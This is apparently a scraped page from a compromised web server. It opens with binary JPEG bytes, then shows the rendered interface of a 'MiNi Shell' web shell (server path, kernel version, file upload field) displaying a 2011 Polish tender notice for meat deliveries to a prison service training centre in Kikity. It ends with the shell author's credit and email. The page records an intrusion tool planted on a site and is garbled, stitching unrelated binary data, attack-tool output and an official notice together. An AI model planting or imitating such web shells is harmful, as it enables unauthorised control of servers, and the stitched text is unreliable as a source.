JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110415/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110415/80432-N-2011.html

<p class="kh_header"><b>Kikity: Sukcesywne dostawy mięsa i wędlin do Ośrodka Doskonalenia Kadr Służby Więziennej w Kikitach</b><br>
<b>Numer ogłoszenia: 80432 - 2011; data zamieszczenia: 15.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Doskonalenia Kadr Służby Więziennej , Kikity 33, 11-332 Kikity, woj. warmińsko-mazurskie, tel. 0-89 718-11-23, faks 0-89 718-11-23 wew. 303.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywne dostawy mięsa i wędlin do Ośrodka Doskonalenia Kadr Służby Więziennej w Kikitach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są  sukcesywne dostawy mięsa i wędlin do Ośrodka Doskonalenia Kadr Służby Więziennej w Kikitach  Kod CPV: 15100000-9
2.	Zakres dostaw obejmuje:
2.1. sprzedaż  mięsa i wędlin  przez wykonawcę w cenach, ilościach i asortymencie określonym w tabelach stanowiącej formularz cenowy (załącznik nr 4 do SIWZ)
2.2. dostawy mięsa i wędlin transportem własnym wykonawcy.
Lp
	Nazwa artykułu
	j.m.
	Ilość

1
	2	3	4
1	Baleron gotowany	kg	100
2	Blok z indyka	kg
	200
3	Boczek surowy wp.
	kg
	100
4	Boczek wędzony	kg	50
5	Tuszonka 	kg	200
6	Cielęcina-udziec b/k	kg	50
7	Flaki wołowe surowe	kg
	            200
8	Golonka surowa tylnia	kg
	400
9	Kiełbasa szynkowa z indyka	kg	300
10	Hamburger drobiowe.	Kg
	10
11	Karkówka wp. B/k	kg
	800


12	Kaszanka 	kg
	300
13	Kiełbasa biała surowa	kg	1000
14	Kiełbasa jałowcowa	kg	100

15	Kiełbasa krakowska sucha 	kg	150
16	Kiełbasa krakowska parzona	kg
	300
17	Kiełbasa mazowiecka	kg	100
18	Kiełbasa rębska	kg	100
19	Kiełbasa parówkowa	kg
	200
20	Kiełbasa piwna	kg	180
21	Kiełbasa szynkowa	kg	80
22	Kiełbasa zwyczajna	kg
	400
23	Kiełbasa żywiecka	kg	150
24	Konserwa mięsna 
300 g 	szt	200
25	Łopatka b/k pieczona	kg
	50
26	Metka cebulowa	kg	50
27	Mielonka rodzinna
	kg
	140
28	Mięso wieprzowe II chude -Tryming	kg
	1400
29	Mortadela 	kg
	200
30	Nerki wieprzowe	kg
	50
31	Nogi wieprzowe	kg
	70
32	Ogonówka	kg	50
33	Parówki cienkie 	kg
	250
34	Kaszanka cienka 	kg	100
35	Kiełbasa śniadaniowa	kg	100
36	Pasztetowa smakowa	kg
	250
37	Pieczeń myśliwska	kg
	200
38	Pieczeń rzymska	kg
	100
39	Filet z kurczaka-sur.	kg
	1000
40	Filet wędzony drobiowy	kg	20
41	Przekładaniec grecki	kg	250
42	Rolada zamkowa	kg
	100
43	Salami domowe	kg	100
44	Salceson włoski	kg
	150
45	Schab wieprzowy b/k surowe	kg
	500
46	Serca wieprzowe surowe	kg	100
47	Serdelki 	kg	500
48	Kiełbasa olsztyńska	kg	50
49	Polędwica z indyka	kg	120
50	Golonka konserwowa	kg	100
51	Szynka staropolska	kg	100
52	Smaczek konserwowy	kg	150
53	Salceson czarny z ozorami	kg	50
54	Szynka zbójnicka	kg
	200
55	Szynka wieprzowa surowa b/k bez skóry	kg
	100
56	Szynka złotopolska	kg	50
57	Szynkówka	kg	20
58	Udziec wołowy b/k	kg	50
59	Wątroba wieprzowa	kg
	100
60	Kiełbasa domowa	kg	40
61	Schab krotoszyńska	kg	20
62	Mięso wieprzowe tłuste II	kg	200
63	Żeberka wieprzowe	kg	70
64	Serca drobiowe	kg	35
65	Kabanosy	kg	100
66	Parówki cienkie cielęce typu cielaczki śniadaniowe	kg	40
67	Schab benedykta	kg	40
68	Kości wołowe	kg	1000
69	Szynka  w siatce	kg	150
70	Kiełbasa ogniskowa	kg	100
71	Polędwica kanadyjska	kg	50
72	Polędwica miodowa	kg	50
73	Filet królewski w majeranku	kg	100
74	Szynka konserwowa z indyka	kg	100
75	Salami ekstra smakowe z dodatkiem przypraw	kg	50
76	Filet złocisty z kurczaka wędzony typu sopelek drobiowy	kg	20
77	Pasztet drobiowy kons. 50g	kg	10
78	Golonka zapiekana bez kości	kg	50
79	Golonka z poligonu	kg	50
80	Wędzonka wiejska	kg	50
81	Karczek wieprzowy konserwa 300g	Szt.	100
82	Polędwica wołowa sur	kg	20
83	Polędwiczki wieprzowe sur	kg	20
84	Pasztet drobiowo- wp. 300g-puszka	szt.	300
85	Porcje rosołowe ze skrzydłem.	Kg
	200
86	Skrzydła z kurczaka	kg	250
87	Udo z kurczaka	kg
	1000
88	Wątroba drobiowa	kg	100
89	Żołądki drobiowe	kg	100
90	Kaczka patroszona	kg	30
91	Kurczak patroszony	kg	400
92	Antrykot b/k	kg	100
93	Polędwica drobiowa w majeranku	kg	30
94	Konserwa turystyczna 130k puszka	kg	10
95	Gulasz angielski 130g	kg	10
96	Golonka polska 110g puszka	kg	10
97	Szynka polska 110 g puszka	kg	10
98	Kiełbasa z gospody cienka	kg	100
99	Kiełbasa z patyka	kg	100
100	Kiełbasa czosnkowa cienka	kg	100
101	Kiełbasa słomkowa cienka	kg	100
102	Ozory wieprzowe.	Kg	20
103	Mięso mielone wieprzowe.	Kg	10
104	Szynka wiśniowa	Kg	50
105	Mielonka prasowana	Kg	20
106	Mielonka w galarecie	Kg	20
107	Schab z pieprzem	Kg	20
108	Polędwica wiśniowa	Kg	10
109	Polędwica łososiowa	Kg	20
110	Filet świeży z indyka	Kg	100
111	Konserwa Tyrolska 	Kg	100
112	Pasztet królewski z morelą	Kg	20
113	Pasztet królewski z żurawiną	Kg	20
114	Pasztet królewski ze śliwką	Kg	20
115	Kiełbasa polska wędzona	kg	20
116	Boczek duński pasy	kg	50
117	Szynka Jana	kg	20
118	Szynka z indyka wędzona	kg	10
119	Schab pieczony b/k	kg	30
120	Wieprzowina pieczona	kg	20
121	Szynka starowiejska	kg	20
122	Karczek po żydowsku	kg	40
123	Szynka staropolska	kg	20
124	Łopatka na szaro	kg	40
125	Szynka swojska	kg	20
126	Szynka pieczona	kg	20
127	Ogonówka gotowana	kg	30
128	Szynka Bochuna plastry 100g	kg	5
129	Szynka konserwowa plastry 100g	kg	5
130	Karkówka Sarmacka	kg	20
131	Polędwica drobiowa w majeranku	kg	20
132	Karkówka b/k głęboko mrożona	Kg	100
133	Schab b/k wp. głęboko mrożony	kg	100
134	Łopatka b/k głęboko mrożona	kg	100
135	Filet z kurczaka głęboko mrożony	kg	100
136	Serdelki indycze	kg	200
137	Pasztetowa drobiowa	kg	150.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.1.	Oświadczenia zgodnie z wymaganiami art. 22 ust.1 Ustawy,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.1.	Oświadczenia zgodnie z wymaganiami art. 22 ust.1 Ustawy,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.1.	Oświadczenia zgodnie z wymaganiami art. 22 ust.1 Ustawy,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.1.	Oświadczenia zgodnie z wymaganiami art. 22 ust.1 Ustawy,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.1.	Oświadczenia zgodnie z wymaganiami art. 22 ust.1 Ustawy,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Ceny jednostkowe nie mogą ulec zmianie w trakcie obowiązywania umowy, za wyjątkiem: zmiany obowiązującej stawki podatku VAT. Umowa ulegnie zmianie w zakresie zmiany obowiązującej stawki podatku VAT oraz wartości brutto przy zachowaniu niezmiennych cen jednostkowych netto przedmiotu zamówienia oraz wartości netto umowy o którym mowa w § 4 ust. 1 umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Doskonalenia Kadr Słuzby Więziennej w Kikitach
Kikity 33
11-332 Lutry.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.04.2011 godzina 08:15, miejsce: Ośrodek Doskonalenia Kadr Słuzby Więziennej w Kikitach
Kikity 33
11-332 Lutry
Recepcja.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com